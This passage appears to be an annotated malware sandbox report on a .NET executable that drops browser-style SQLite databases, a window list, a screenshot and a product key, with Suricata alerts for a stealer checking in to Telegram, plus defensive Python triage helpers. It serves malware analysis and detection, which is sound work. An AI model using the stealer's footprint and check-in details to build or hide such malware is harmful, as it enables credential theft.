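    """Serialise a desktop.ini the way the dropped copies are laid out:
    UTF-16LE with BOM, a leading empty line, CRLF terminators."""
    text = "\r\n" + "".join(line + "\r\n" for line in lines)
    return b"\xff\xfe" + text.encode("utf-16-le")


# Decoded from the 402-byte dropped file (UTF-16 nulls appear as dots in the report).
DOCUMENTS_DESKTOP_INI = desktop_ini_bytes([
    "[.ShellClassInfo]",
    r"LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21770",
    r"IconResource=%SystemRoot%\system32\imageres.dll,-112",
    r"IconFile=%SystemRoot%\system32\shell32.dll",
    "IconIndex=-235",
])
REPORTED_DESKTOP_INI = {"size": 402, "entropy": 3.493087299556618}

# The 29-byte dropped file, laid out as a Windows product key (5 groups of 5).
PRODUCT_KEY_FILE = b"293MD-2NCHV-V6XWG-M48F4-3GQMG"
REPORTED_PRODUCT_KEY = {"size": 29, "entropy": 3.978333581185264}


def random_upper_line(length=1024, seed=1):
    """Constructed stand-in for the 1026-byte files: one line of uniformly
    random A-Z letters plus CRLF. Seeded so the result is reproducible."""
    rng = random.Random(seed)
    return bytes(rng.choice(UPPER) for _ in range(length)) + b"\r\n"


def looks_like_letter_filler(data: bytes) -> bool:
    """Triage rule for the repeated 1026-byte drops: exactly 1024 uppercase
    ASCII letters followed by CRLF, with the letters' entropy near log2(26).
    Uniform A-Z cannot exceed 4.70 bits/byte; compressed or encrypted payloads
    sit near 8, which is why the report marks these files Encrypted: false."""
    if len(data) != 1026 or not data.endswith(b"\r\n"):
        return False
    body = data[:-2]
    if any(b not in UPPER for b in body):
        return False
    return 4.5 <= shannon_entropy(body) <= math.log2(26) + 1e-9


def matches_report(data: bytes, reported: dict, tol: float = 1e-6) -> bool:
    """True when a reconstructed file reproduces the report's Size and
    Entropy fields, i.e. the preview was decoded byte-exactly."""
    return (len(data) == reported["size"]
            and abs(shannon_entropy(data) - reported["entropy"]) < tol)


if __name__ == "__main__":
    for name, blob, rep in [("desktop.ini", DOCUMENTS_DESKTOP_INI, REPORTED_DESKTOP_INI),
                            ("product key", PRODUCT_KEY_FILE, REPORTED_PRODUCT_KEY)]:
        print(f"{name}: {len(blob)} bytes, H={shannon_entropy(blob):.6f}, "
              f"matches report: {matches_report(blob, rep)}")
    filler = random_upper_line()
    print(f"filler: {len(filler)} bytes, H={shannon_entropy(filler):.4f}, "
          f"letter-filler rule: {looks_like_letter_filler(filler)}")
```

Run directly, it prints the three checks. A failed desktop.ini match means the preview was not decoded byte-exactly (a missing BOM or line terminator moves the entropy by far more than the tolerance), which is the reason for keeping both the Size and the Entropy field in the comparison rather than the size alone.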
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):84
                                                            Entropy (8bit):4.6630509827051725
                                                            Encrypted:false
                                                            SSDEEP:3:PHsEiVboFkaQXMtS1ME/M2en:PsEwYVQXOS1TUn
                                                            MD5:58CD2334CFC77DB470202487D5034610
                                                            SHA1:61FA242465F53C9E64B3752FE76B2ADCCEB1F237
                                                            SHA-256:59B3120C5CE1A7D1819510272A927E1C8F1C95385213FCCBCDD429FF3492040D
                                                            SHA-512:C8F52D85EC99177C722527C306A64BA61ADC3AD3A5FEC6D87749FBAD12DA424BA6B34880AB9DA627FB183412875F241E1C1864D723E62130281E44C14AD1481E
                                                            Malicious:false
                                                             Preview (CRLF line breaks restored):
                                                             Active code page: 65001
                                                             The Wireless AutoConfig Service (wlansvc) is not running.
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):20652
                                                            Entropy (8bit):5.671979148545095
                                                            Encrypted:false
                                                            SSDEEP:96:N+VVwdqVD55RXUeyW+jWF6tNckgXE2FSdnUwr1XvCMasK5iSnTkmrsLpqrXt1HEa:C+zaf
                                                            MD5:0BD0B509DFDC92C873CBDD9376DB6FEB
                                                            SHA1:1545843737AAB193C3FE5E4CA3A0762559A6B19A
                                                            SHA-256:535D8022EAF01492BE88009C54F81E1388D529B00EEE946D70740768EE6C7DC1
                                                            SHA-512:46A5CEB0C436CAA93D958FB331E4D016F65FB1D70DA25E7DA6D9EAC110E3611D98F7545E521121CF7D41F0DBC33E879E19C73543FE78B8B159C3DEFFB8D7C864
                                                            Malicious:false
                                                            Preview:NAME: oxGQcqNUEocNrSUtLdUwZWdDVEXY..TITLE: New Tab - Google Chrome..PID: 7756..EXE: C:\Program Files (x86)\BpwDwJKSZpWGbiaqZGqgqaintGedZIsbBHCmBiEHsMaHUEVWlepDZpfsLaDmPvRTLTwkMzmedIGyaeT\oxGQcqNUEocNrSUtLdUwZWdDVEXY.exe..NAME: oxGQcqNUEocNrSUtLdUwZWdDVEXY..TITLE: New Tab - Google Chrome..PID: 7488..EXE: C:\Program Files (x86)\BpwDwJKSZpWGbiaqZGqgqaintGedZIsbBHCmBiEHsMaHUEVWlepDZpfsLaDmPvRTLTwkMzmedIGyaeT\oxGQcqNUEocNrSUtLdUwZWdDVEXY.exe..NAME: oxGQcqNUEocNrSUtLdUwZWdDVEXY..TITLE: New Tab - Google Chrome..PID: 5168..EXE: C:\Program Files (x86)\BpwDwJKSZpWGbiaqZGqgqaintGedZIsbBHCmBiEHsMaHUEVWlepDZpfsLaDmPvRTLTwkMzmedIGyaeT\oxGQcqNUEocNrSUtLdUwZWdDVEXY.exe..NAME: oxGQcqNUEocNrSUtLdUwZWdDVEXY..TITLE: New Tab - Google Chrome..PID: 7320..EXE: C:\Program Files (x86)\BpwDwJKSZpWGbiaqZGqgqaintGedZIsbBHCmBiEHsMaHUEVWlepDZpfsLaDmPvRTLTwkMzmedIGyaeT\oxGQcqNUEocNrSUtLdUwZWdDVEXY.exe..NAME: oxGQcqNUEocNrSUtLdUwZWdDVEXY..TITLE: New Tab - Google Chrome..PID: 2968..EXE: C:\Program Files (x86)\BpwDwJKSZ
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                            Category:dropped
                                                            Size (bytes):73314
                                                            Entropy (8bit):7.803402782461037
                                                            Encrypted:false
                                                            SSDEEP:1536:CdZHFuIQSy/281yqdPRC+33x744q5KuxmeAiB9nK:+Zxjy/2819y+x744q5KAmeAi3nK
                                                            MD5:1E45FEE305D5599EB5F797C6C9C8F8BC
                                                            SHA1:816BC0081EB5A5655A05D70A90D27206648E3FCD
                                                            SHA-256:560DEB6BEE6F394FF1118CA834B8D9C620AF1041C55CD0EF57DD0098B9BB37F2
                                                            SHA-512:77194E79C8B4E52B24E47E412462704FBE9E32AA8655A25E98D3ED06159C8760BCECCFB1A58731429CD6204C0B7146A0BC2CBD0CA18C5E2B36720C0A560583BA
                                                            Malicious:false
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                            Category:dropped
                                                            Size (bytes):5242880
                                                            Entropy (8bit):0.03799545499236577
                                                            Encrypted:false
                                                            SSDEEP:192:58rJQaXoMXp0VW9FxWZru/bNb/fc3DDTnHI:58r54w0VW3xWZrwbFHc3T
                                                            MD5:96AB9233CA2AB3982F98B1BA44CFFE32
                                                            SHA1:A72C6AF1881274392B7D73594D78C4D3F1B91428
                                                            SHA-256:C764FE5DA2665335A3C2E60091F08E21A16CEC35EFD453AE092FEB1D7C3D69BC
                                                            SHA-512:E09E96834C049E56FE5E9A56BA1635CA6A4FB5DF2F2EB8F339C94D4BCF2D24150592B2833D084BD4BD7D0319B4D5C493B5B49A64310E084684375D645DD8CEEC
                                                            Malicious:false
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.1368932887859682
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/k4:MnlyfnGtxnfVuSVumEHFs4
                                                            MD5:9A534FD57BED1D3E9815232E05CCF696
                                                            SHA1:916474D7D073A4EB52A2EF8F7D9EF9549C0808A1
                                                            SHA-256:7BB87D8BC8D49EECAB122B7F5BCD9E77F77B36C6DB173CB41E83A2CCA3AC391B
                                                            SHA-512:ADE77FBBDE6882EF458A43F301AD84B12B42D82E222FC647A78E5709554754714DB886523A639C78D05BC221D608F0F99266D89165E78F76B21083002BE8AEFF
                                                            Malicious:false
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):159744
                                                            Entropy (8bit):0.5394293526345721
                                                            Encrypted:false
                                                            SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                            MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                            SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                            SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                            SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                            Malicious:false
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.1211596417522893
                                                            Encrypted:false
                                                            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                            MD5:0AB67F0950F46216D5590A6A41A267C7
                                                            SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                            SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                            SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                            Malicious:false
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):51200
                                                            Entropy (8bit):0.8746135976761988
                                                            Encrypted:false
                                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                            Malicious:false
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):155648
                                                            Entropy (8bit):0.5407252242845243
                                                            Encrypted:false
                                                            SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                            MD5:7B955D976803304F2C0505431A0CF1CF
                                                            SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                            SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                            SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                            Malicious:false
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):98304
                                                            Entropy (8bit):0.08235737944063153
                                                            Encrypted:false
                                                            SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                            MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                            SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                            SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                            SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                            Malicious:false
                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):5.896903575826479
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Windows Screen Saver (13104/52) 0.07%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            File name:vYz1Z2heor.exe
                                                            File size:179'200 bytes
                                                            MD5:7f1630df6b57af024a3b561bdadc208f
                                                            SHA1:9b304cb2eff05f040b76eccc00ee55b914cf1839
                                                            SHA256:c9dbac4fe659e8918f50a4a157713e40d71e05367799af66d1d7845d958ee3f7
                                                            SHA512:742219cb5c76b9d39ed56cff988a533d19ef3e202e0fa48e9a3aed7dd9de190eef0c313bc974e37e7f363892eb6787bc66657324be2f0fb05d1b0021ae61ec9e
                                                            SSDEEP:3072:Je8p6ewdOIwQx76vK/bvTv0cU+lL/dMlZZUZ0b2gT1wARE+WpCc:F6ewwIwQJ6vKX0c5MlYZ0b2K
                                                            TLSH:C8045B5837D80A15F3BE5FB8F4B012118B75B477AA1AE75F08E920EE0D62351E911FA3
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................... ............`................................
                                                            Icon Hash:90cececece8e8eb0
                                                            Entrypoint:0x42d1be
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x66C19902 [Sun Aug 18 06:47:30 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
(the 97 instructions that follow in the listing are all add byte ptr [eax], al: the disassembler reading the zero padding behind the 6-byte entry stub. 0x402000 is the IAT (RVA 0x2000 at Imagebase 0x400000), whose only entry is mscoree.dll!_CorExeMain, so the stub hands control straight to the CLR loader.)
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x2d16c          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x2e000          0x600         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x30000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0x2b1c4       0x2b200   b02323ff1bfcfb9ff5c4069b0b1f3c42  False     0.4603713768115942  data       5.924394028212997    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x2e000          0x600         0x600     ccd2ec796af2f339686e45e5513c2caf  False     0.4140625           data       4.029504312109572    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x30000          0xc           0x200     8e19c1ec6db51c8435749ecf42a022c8  False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name         RVA      Size   Type                                                                              Language  Country  ZLIB Complexity
RT_VERSION   0x2e0a0  0x30c  data                                                                                                 0.4269230769230769
RT_MANIFEST  0x2e3ac  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                    0.5489795918367347
DLL          Import
mscoree.dll  _CorExeMain
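What the directory, section and import tables above add up to is the standard .NET loader stub: the entry point at 0x42d1be is a single jmp dword ptr [00402000h], 0x402000 is the 8-byte IAT (RVA 0x2000), the only import is mscoree.dll!_CorExeMain, and the CLR header (the COM descriptor directory) sits right behind the IAT at RVA 0x2008. The Python below is an added example, not part of the Joe Sandbox report, that checks those three facts on any PE32 image with only the standard library. To run offline it parses a constructed miniature PE that mirrors the report's layout (same IAT and CLR-header RVAs, same single import, but a compact .text section with the stub at RVA 0x21be rather than the real 0x2d1be); pass real file bytes to parse_pe or is_clr_stub to run it on a sample. PE32+ images are outside what it handles.

```python
"""Recover the CLR loader-stub facts of a PE32 file with only the standard library."""
import struct

IMAGE_BASE = 0x400000                                    # Imagebase from the report
DIR_IMPORT, DIR_IAT, DIR_COM_DESCRIPTOR = 1, 12, 14      # data-directory indices


def _cstr(data, off):
    return data[off:data.index(b"\0", off)].decode("ascii")


def parse_pe(data):
    """Entry point, image base, data directories and section table of a PE32 image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    pe = struct.unpack_from("<I", data, 0x3C)[0]                 # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", data, pe + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]
    opt = pe + 24                                                # IMAGE_OPTIONAL_HEADER32
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 is handled here")
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    ndirs = struct.unpack_from("<I", data, opt + 92)[0]
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        sections.append((name.rstrip(b"\0").decode(), va, vsize, rawsize, rawptr))
    return {"entry": entry, "image_base": image_base, "dirs": dirs, "sections": sections}


def rva_to_offset(sections, rva):
    for _, va, vsize, rawsize, rawptr in sections:
        if va <= rva < va + max(vsize, rawsize):
            return rawptr + (rva - va)
    raise ValueError(f"RVA {rva:#x} is in no section")


def first_import(data, hdr):
    """(DLL, symbol) of the first import descriptor; a pure CLR stub imports only mscoree.dll!_CorExeMain."""
    imp_rva, _ = hdr["dirs"][DIR_IMPORT]
    oft, _, _, name_rva, ft = struct.unpack_from("<IIIII", data, rva_to_offset(hdr["sections"], imp_rva))
    dll = _cstr(data, rva_to_offset(hdr["sections"], name_rva))
    thunk = struct.unpack_from("<I", data, rva_to_offset(hdr["sections"], oft or ft))[0]
    if thunk & 0x80000000:                                       # import by ordinal
        return dll, f"#{thunk & 0xFFFF}"
    return dll, _cstr(data, rva_to_offset(hdr["sections"], thunk) + 2)  # skip the 2-byte hint


def is_clr_stub(data):
    """True when a CLR header exists and the entry point is FF 25 <imagebase+IAT>, i.e. jmp dword ptr [IAT]."""
    hdr = parse_pe(data)
    com_rva, com_size = hdr["dirs"][DIR_COM_DESCRIPTOR]
    if com_rva == 0 or com_size == 0:
        return False
    off = rva_to_offset(hdr["sections"], hdr["entry"])
    if data[off:off + 2] != b"\xff\x25":
        return False
    target = struct.unpack_from("<I", data, off + 2)[0]
    return (target == hdr["image_base"] + hdr["dirs"][DIR_IAT][0]
            and first_import(data, hdr) == ("mscoree.dll", "_CorExeMain"))


def build_sample(clr=True):
    """Constructed miniature PE32 (not the real sample) with the report's layout: IAT at RVA
    0x2000, CLR header at 0x2008, one mscoree.dll!_CorExeMain import, jmp stub in .text."""
    sec = bytearray(0x400)                                       # .text: RVA 0x2000, file offset 0x200
    struct.pack_into("<I", sec, 0x000, 0x2130)                   # IAT[0] -> IMAGE_IMPORT_BY_NAME
    struct.pack_into("<I", sec, 0x008, 0x48)                     # IMAGE_COR20_HEADER.cb
    struct.pack_into("<IIIII", sec, 0x100, 0x2120, 0, 0, 0x2140, 0x2000)  # import descriptor
    struct.pack_into("<I", sec, 0x120, 0x2130)                   # OriginalFirstThunk entry
    sec[0x130:0x13E] = b"\0\0_CorExeMain\0"                      # hint + name
    sec[0x140:0x14C] = b"mscoree.dll\0"
    sec[0x1BE:0x1C4] = b"\xff\x25" + struct.pack("<I", IMAGE_BASE + 0x2000)  # jmp dword ptr [00402000h]
    hdr = bytearray(0x200)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x80)                      # e_lfanew
    hdr[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<HH", hdr, 0x84, 0x14C, 1)                 # i386, one section
    struct.pack_into("<H", hdr, 0x94, 0xE0)                      # SizeOfOptionalHeader
    opt = 0x98
    struct.pack_into("<H", hdr, opt, 0x10B)                      # PE32 magic
    struct.pack_into("<I", hdr, opt + 16, 0x21BE)                # AddressOfEntryPoint
    struct.pack_into("<I", hdr, opt + 28, IMAGE_BASE)
    struct.pack_into("<I", hdr, opt + 92, 16)                    # NumberOfRvaAndSizes
    dirs = {DIR_IMPORT: (0x2100, 0x14), DIR_IAT: (0x2000, 0x8)}
    if clr:
        dirs[DIR_COM_DESCRIPTOR] = (0x2008, 0x48)
    for idx, (rva, size) in dirs.items():
        struct.pack_into("<II", hdr, opt + 96 + 8 * idx, rva, size)
    struct.pack_into("<8sIIII", hdr, opt + 0xE0, b".text", 0x400, 0x2000, 0x400, 0x200)
    return bytes(hdr) + bytes(sec)
```

is_clr_stub(build_sample()) returns True and is_clr_stub(build_sample(clr=False)) returns False. The check deliberately requires all three facts at once: a non-empty COM descriptor alone is what most tools key on, but a native image can carry a stale CLR directory, and an FF 25 entry alone is just any import thunk; together with the single mscoree.dll!_CorExeMain import they identify the managed loader stub that the report's disassembly shows.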
Timestamp                        Protocol  SID      Signature                                                Severity  Source Port  Dest Port  Source IP     Dest IP
2024-08-20T11:06:31.130632+0200  TCP       2044766  ET MALWARE WorldWind Stealer Checkin via Telegram (GET)  1         49703        443        192.168.2.10  149.154.167.220
2024-08-20T11:06:32.063374+0200  TCP       2803305  ETPRO MALWARE Common Downloader Header Pattern H         3         49704        443        192.168.2.10  149.154.167.220
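To read the packet list that follows together with the two alerts above, an analyst normally collapses packets into sessions and then asks which session each alert fired on. The Python below is an added example, not part of the report: it sessionises rows in the report's (timestamp, source port, dest port, source IP, dest IP) form with the analysis VM 192.168.2.10 as the client, then maps each Suricata alert onto the session with the same client port, server and service whose lifetime covers the alert time. The embedded packet rows are an excerpt copied from the report's packet list (the first and last packets of four connections) and the alert rows are the two above; treating CEST as +02:00 and allowing one second of slack between capture and sensor clocks are assumptions made here, and the report gives no byte counts, so sessions are sized in packets only.

```python
"""Turn a Joe Sandbox packet list into TCP sessions and pin the Suricata alerts onto them."""
from datetime import datetime, timedelta, timezone

SANDBOX_IP = "192.168.2.10"                    # the analysis VM in this report
CEST = timezone(timedelta(hours=2))            # packet times are CEST; alert times carry +0200 (assumed equal)

# Excerpt copied from the report's packet list (first and last packets of four connections),
# as (timestamp, source port, dest port, source IP, dest IP).
PACKETS = [
    ("Aug 20, 2024 11:06:28.099852085 CEST", 49701, 80, "192.168.2.10", "104.16.185.241"),
    ("Aug 20, 2024 11:06:28.104830980 CEST", 80, 49701, "104.16.185.241", "192.168.2.10"),
    ("Aug 20, 2024 11:06:28.673122883 CEST", 49702, 443, "192.168.2.10", "172.67.196.114"),
    ("Aug 20, 2024 11:06:30.318984985 CEST", 49702, 443, "192.168.2.10", "172.67.196.114"),
    ("Aug 20, 2024 11:06:30.327549934 CEST", 49701, 80, "192.168.2.10", "104.16.185.241"),
    ("Aug 20, 2024 11:06:30.330678940 CEST", 49703, 443, "192.168.2.10", "149.154.167.220"),
    ("Aug 20, 2024 11:06:31.130688906 CEST", 443, 49703, "149.154.167.220", "192.168.2.10"),
    ("Aug 20, 2024 11:06:31.133168936 CEST", 49703, 443, "192.168.2.10", "149.154.167.220"),
    ("Aug 20, 2024 11:06:31.140183926 CEST", 49704, 443, "192.168.2.10", "149.154.167.220"),
    ("Aug 20, 2024 11:06:32.063421011 CEST", 443, 49704, "149.154.167.220", "192.168.2.10"),
    ("Aug 20, 2024 11:06:32.064760923 CEST", 49704, 443, "192.168.2.10", "149.154.167.220"),
]
# The report's two Suricata alerts: (timestamp, SID, signature, source port, dest port, source IP, dest IP).
ALERTS = [
    ("2024-08-20T11:06:31.130632+0200", 2044766,
     "ET MALWARE WorldWind Stealer Checkin via Telegram (GET)", 49703, 443, "192.168.2.10", "149.154.167.220"),
    ("2024-08-20T11:06:32.063374+0200", 2803305,
     "ETPRO MALWARE Common Downloader Header Pattern H", 49704, 443, "192.168.2.10", "149.154.167.220"),
]


def parse_packet_ts(text):
    """'Aug 20, 2024 11:06:28.099852085 CEST' -> aware datetime; nanoseconds truncated to microseconds."""
    stamp = text.rpartition(" ")[0]                     # drop the zone name
    head, frac = stamp.split(".")
    return datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f").replace(tzinfo=CEST)


def sessions(packets):
    """Group packets into client->server sessions; the sandbox VM is always treated as the client."""
    out = {}
    for ts_text, sport, dport, src, dst in packets:
        ts = parse_packet_ts(ts_text)
        # Orient the packet so the key is (client port, server IP, server port) whichever way it flows.
        key = (sport, dst, dport) if src == SANDBOX_IP else (dport, src, sport)
        s = out.setdefault(key, {"client_port": key[0], "server": key[1], "server_port": key[2],
                                 "packets": 0, "first": ts, "last": ts, "alerts": []})
        s["packets"] += 1
        s["first"], s["last"] = min(s["first"], ts), max(s["last"], ts)
    return sorted(out.values(), key=lambda s: s["first"])


def attach_alerts(sess, alerts, slack=timedelta(seconds=1)):
    """Attach each alert to the session with the same client port, server and service whose
    lifetime covers the alert time; slack (assumed 1 s) absorbs capture-vs-IDS clock skew."""
    unmatched = []
    for ts_text, sid, sig, sport, dport, src, dst in alerts:
        ts = datetime.strptime(ts_text, "%Y-%m-%dT%H:%M:%S.%f%z")
        hit = next((s for s in sess
                    if (s["client_port"], s["server"], s["server_port"]) == (sport, dst, dport)
                    and s["first"] - slack <= ts <= s["last"] + slack), None)
        if hit is None:
            unmatched.append(sid)
        else:
            hit["alerts"].append((sid, sig))
    return sess, unmatched


def report(packets=PACKETS, alerts=ALERTS):
    """Rows of (client port, server, server port, packet count, duration in s, [alert SIDs]), plus unmatched SIDs."""
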